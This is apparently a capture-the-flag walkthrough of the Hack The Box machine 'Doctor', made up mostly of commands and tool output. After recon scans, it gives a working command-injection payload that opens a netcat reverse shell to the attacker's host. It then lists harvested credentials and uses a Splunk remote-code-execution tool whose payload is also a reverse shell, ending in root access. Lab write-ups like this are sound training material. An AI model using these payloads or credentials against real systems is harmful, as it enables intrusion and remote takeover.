Doctor
Introduction:
Recon
1# nmap -sS -sV -sC -T4 -oN nmap.doctor.txt 10.10.10.209
2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 14:19 EST
3Nmap scan report for 10.10.10.209
4Host is up (0.015s latency).
5Not shown: 997 filtered ports
6PORT STATE SERVICE VERSION
722/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8| ssh-hostkey:
9| 3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
10| 256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
11|_ 256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
1280/tcp open http Apache httpd 2.4.41 ((Ubuntu))
13|_http-server-header: Apache/2.4.41 (Ubuntu)
14|_http-title: Doctor
158089/tcp open ssl/http Splunkd httpd
16| http-robots.txt: 1 disallowed entry
17|_/
18|_http-server-header: Splunkd
19|_http-title: splunkd
20| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
21| Not valid before: 2020-09-06T15:57:27
22|_Not valid after: 2023-09-06T15:57:27
23Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
24
25Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
26Nmap done: 1 IP address (1 host up) scanned in 36.35 seconds
27
1nikto -url http://doctor.htb
2- Nikto v2.1.6
3---------------------------------------------------------------------------
4+ Target IP: 10.10.10.209
5+ Target Hostname: doctor.htb
6+ Target Port: 80
7+ Start Time: 2020-12-22 15:13:03 (GMT-5)
8---------------------------------------------------------------------------
9+ Server: Apache/2.4.41 (Ubuntu)
10+ The anti-clickjacking X-Frame-Options header is not present.
11+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
12+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
13+ No CGI Directories found (use '-C all' to force check all possible dirs)
14+ Server may leak inodes via ETags, header found with file /, inode: 4d88, size: 5afad8bea6589, mtime: gzip
15+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
16+ OSVDB-3268: /css/: Directory indexing found.
17+ OSVDB-3092: /css/: This might be interesting...
18+ OSVDB-3268: /images/: Directory indexing found.
19+ 7785 requests: 0 error(s) and 8 item(s) reported on remote host
20+ End Time: 2020-12-22 15:19:35 (GMT-5) (392 seconds)
21---------------------------------------------------------------------------
22+ 1 host(s) tested
23
24
25 *********************************************************************
26 Portions of the server's headers (Apache/2.4.41) are not in
27 the Nikto 2.1.6 database or are newer than the known string. Would you like
28 to submit this information (*no server specific data*) to CIRT.net
29 for a Nikto update (or you may email to [email protected]) (y/n)? y
30
31+ The anti-clickjacking X-Frame-Options header is not present.
32+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
33+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
34+ The site uses SSL and Expect-CT header is not present.
35- Sent updated info to cirt.net -- Thank you!
36
37
Enumeration
root@kinetic:~# cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kinetic
The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters
10.10.10.209 doctor.htb doctors.htb
Exploitation
Submit a new post
<img src=http://10.10.14.25/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.25'$IFS'4444')>
1
2[+] Readable files belonging to root and readable by me but not world readable
3-rw-r----- 1 root adm 204 Jan 2 16:10 /var/log/cups/error_log.1
4-rw-r----- 1 root adm 109 Aug 13 08:13 /var/log/cups/error_log.4.gz
5-rw-r----- 1 root adm 224 Jan 2 14:08 /var/log/cups/access_log.1
6-rw-r----- 1 root adm 204 Sep 18 00:00 /var/log/cups/access_log.7.gz
7-rw-r----- 1 root adm 267 Sep 23 15:42 /var/log/cups/access_log.3.gz
8-rw-r----- 1 root adm 102 Jan 3 01:24 /var/log/cups/error_log
9-rw-r----- 1 root adm 355 Sep 28 15:07 /var/log/cups/access_log.2.gz
10-rw-r----- 1 root adm 108 Sep 28 12:12 /var/log/cups/error_log.2.gz
11-rw-r----- 1 root adm 118 Sep 15 11:56 /var/log/cups/error_log.3.gz
12-rw-r----- 1 root adm 536 Jan 3 00:00 /var/log/cups/access_log
13-rw-r----- 1 root adm 190 Sep 19 00:00 /var/log/cups/access_log.6.gz
14-rw-r----- 1 root adm 219 Sep 22 10:40 /var/log/cups/access_log.5.gz
15-rw-r----- 1 root adm 256 Sep 23 10:46 /var/log/cups/access_log.4.gz
16-rw-r----- 1 root adm 460 Sep 15 00:00 /var/log/apache2/error.log.10.gz
17-rw-r----- 1 root adm 629 Sep 16 00:00 /var/log/apache2/error.log.9.gz
18-rw-r----- 1 root adm 323 Aug 21 13:00 /var/log/apache2/access.log.11.gz
19-rw-r----- 1 root adm 671 Jan 3 01:23 /var/log/apache2/error.log
20-rw-r----- 1 root adm 21578 Sep 17 16:23 /var/log/apache2/backup
21-rw-r----- 1 root adm 668 Sep 28 15:02 /var/log/apache2/access.log.2.gz
22-rw-r----- 1 root adm 352 Sep 19 00:00 /var/log/apache2/error.log.6.gz
23-rw-r----- 1 root adm 895 Jan 3 00:00 /var/log/apache2/error.log.1
1
2 -> Extracting tables from /home/web/blog/flaskblog/site.db (limit 20)
3 --> Found interesting column names in user (output limit 10)
4CREATE TABLE user (
5 id INTEGER NOT NULL,
6 username VARCHAR(20) NOT NULL,
7 email VARCHAR(120) NOT NULL,
8 image_file VARCHAR(20) NOT NULL,
9 password VARCHAR(60) NOT NULL,
10 PRIMARY KEY (id),
11 UNIQUE (username),
12 UNIQUE (email)
13)
141, admin, [email protected], default.gif, $2b$12$Tg2b8u/elwAyfQOvqvxJgOTcsbnkFANIDdv6jVXmxiWsg4IznjI0S
15
16
1
2[+] Finding passwords inside logs (limit 70)
3Binary file /var/log/apache2/access.log.13.gz matches
4Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/system.journal matches
5Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/user-1001.journal matches
6Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/user-1002.journal matches
7Binary file /var/log/kern.log.3.gz matches
8Binary file /var/log/syslog.5.gz matches
9/var/log/apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
10/var/log/auth.log.1:Jan 2 14:08:55 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for 'root'.
11/var/log/auth.log.1:Jan 2 14:09:00 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for 'root'.
12/var/log/auth.log.1:Jan 2 14:09:01 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for 'root'.
13/var/log/auth.log.1:Jan 2 15:18:02 doctor sudo: pam_unix(sudo:auth): auth could not identify password for [web]
14/var/log/auth.log.1:Jan 2 15:39:22 doctor sudo: pam_unix(sudo:auth): auth could not identify password for [web]
15/var/log/auth.log.1:Jan 2 15:40:08 doctor sudo: web : command not allowed ; TTY=pts/0 ; PWD=/home/web/blog/flaskblog ; USER=root ; COMMAND=list
16/var/log/auth.log.1:Jan 2 16:07:14 doctor sshd[51830]: Failed password for invalid user shaun from 10.10.14.8 port 60708 ssh2
17/var/log/auth.log.1:Jan 2 16:12:36 doctor sudo: pam_unix(sudo:auth): auth could not identify password for [shaun]
18/var/log/auth.log.1:Jan 2 16:12:36 doctor sudo: shaun : command not allowed ; TTY=pts/0 ; PWD=/home/shaun ; USER=root ; COMMAND=list
19/var/log/auth.log:Jan 3 01:26:44 doctor sudo: pam_unix(sudo:auth): auth could not identify password for [web]
20/var/log/auth.log:Jan 3 01:26:44 doctor sudo: web : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
21/var/log/dmesg.0:[ 5.666833] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
22
Post-exploit/PrivEsc
py3) eneloop@kinetic:…/splunk/SplunkWhisperer2/PySplunkWhisperer2$ python ./PySplunkWhisperer2_remote.py –host doctors.htb –port 8089 –lhost 10.10.14.25 –lport 4455 –username shaun –password Guitar123 –payload ‘nc.traditional -e /bin/bash ‘10.10.14.25’ ‘4455’’ Running in remote mode (Remote Code Execution) [.] Authenticating… [+] Authenticated [.] Creating malicious app bundle… [+] Created malicious app bundle in: /tmp/tmpy_uzebkn.tar [+] Started HTTP server for remote mode [.] Installing app from: http://10.10.14.25:4455/ 10.10.10.209 - - [02/Jan/2021 19:50:25] “GET / HTTP/1.1” 200 - [+] App installed, your code should be running now!
Press RETURN to cleanup
[.] Removing app… [+] App removed
^CTraceback (most recent call last):
File “/oscp/tools/splunk/SplunkWhisperer2/PySplunkWhisperer2/./PySplunkWhisperer2_remote.py”, line 144, in
(py3) eneloop@kinetic:…/splunk/SplunkWhisperer2/PySplunkWhisperer2$ python ./PySplunkWhisperer2_remote.py –host doctors.htb –port 8089 –lhost 10.10.14.25 –username shaun –password Guitar123 –payload ‘nc.traditional -e /bin/bash ‘10.10.14.25’ ‘4456’’ Running in remote mode (Remote Code Execution) [.] Authenticating… [+] Authenticated [.] Creating malicious app bundle… [+] Created malicious app bundle in: /tmp/tmpsf0xsdta.tar [+] Started HTTP server for remote mode [.] Installing app from: http://10.10.14.25:8181/ 10.10.10.209 - - [02/Jan/2021 19:52:09] “GET / HTTP/1.1” 200 - [+] App installed, your code should be running now!
Press RETURN to cleanup
eneloop@kinetic:…/splunk/SplunkWhisperer2/PySplunkWhisperer2$ nc -lvnp 4455 listening on [any] 4455 … ^C eneloop@kinetic:…/splunk/SplunkWhisperer2/PySplunkWhisperer2$ nc -lvnp 4456 listening on [any] 4456 … connect to [10.10.14.25] from (UNKNOWN) [10.10.10.209] 51458 whoami root cd /root ls root.txt cat root.txt 019XXXXXXXXXXXXXXXXXXXXXX0874